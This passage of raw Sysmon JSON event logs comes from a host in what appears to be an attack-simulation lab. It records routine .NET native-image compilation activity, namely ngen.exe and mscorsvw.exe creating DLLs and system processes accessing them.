05:59:36.871","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04C8-5F25-0000-0010DA911000}","TargetProcessId":"2580","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7512,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:37.496\r\nProcessGuid: {A837DB8D-04C8-5F25-0000-0010DA911000}\r\nProcessId: 2580\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\a14-0\\System.EnterpriseServices.Wrapper.dll\r\nCreationUtcTime: 2020-08-01 05:59:37.496","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:37.496","ProcessGuid":"{A837DB8D-04C8-5F25-0000-0010DA911000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\a14-0\\System.EnterpriseServices.Wrapper.dll","CreationUtcTime":"2020-08-01 05:59:37.496","EventReceivedTime":"2020-08-01 05:59:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7513,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:37.512\r\nProcessGuid: {A837DB8D-04C8-5F25-0000-0010DA911000}\r\nProcessId: 2580\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\a14-0\\System.EnterpriseServices.dll\r\nCreationUtcTime: 2020-08-01 05:59:37.512","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:37.512","ProcessGuid":"{A837DB8D-04C8-5F25-0000-0010DA911000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\a14-0\\System.EnterpriseServices.dll","CreationUtcTime":"2020-08-01 05:59:37.512","EventReceivedTime":"2020-08-01 05:59:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7514,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:37.590\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04C9-5F25-0000-0010F5951000}\r\nTargetProcessId: 3788\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:37.590","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04C9-5F25-0000-0010F5951000}","TargetProcessId":"3788","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7515,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:37.590\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04C9-5F25-0000-0010F5951000}\r\nTargetProcessId: 3788\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:37.590","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04C9-5F25-0000-0010F5951000}","TargetProcessId":"3788","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7516,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:37.590\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04C9-5F25-0000-0010F5951000}\r\nTargetProcessId: 3788\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:37.590","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04C9-5F25-0000-0010F5951000}","TargetProcessId":"3788","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7517,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:37.684\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-0010A6820E00}\r\nTargetProcessId: 2480\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:37.684","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-0010A6820E00}","TargetProcessId":"2480","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7518,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:37.684\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-0010A6820E00}\r\nTargetProcessId: 2480\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:37.684","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-0010A6820E00}","TargetProcessId":"2480","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7519,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:37.684\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-0010A6820E00}\r\nTargetProcessId: 2480\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:37.684","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-0010A6820E00}","TargetProcessId":"2480","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:39","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7520,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:39.840\r\nProcessGuid: {A837DB8D-04C9-5F25-0000-0010C7991000}\r\nProcessId: 2480\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\9b0-0\\System.IdentityModel.dll\r\nCreationUtcTime: 2020-08-01 05:59:39.840","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:39.840","ProcessGuid":"{A837DB8D-04C9-5F25-0000-0010C7991000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\9b0-0\\System.IdentityModel.dll","CreationUtcTime":"2020-08-01 05:59:39.840","EventReceivedTime":"2020-08-01 05:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:39","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7521,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:39.918\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04CB-5F25-0000-00105CA01000}\r\nTargetProcessId: 3016\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: 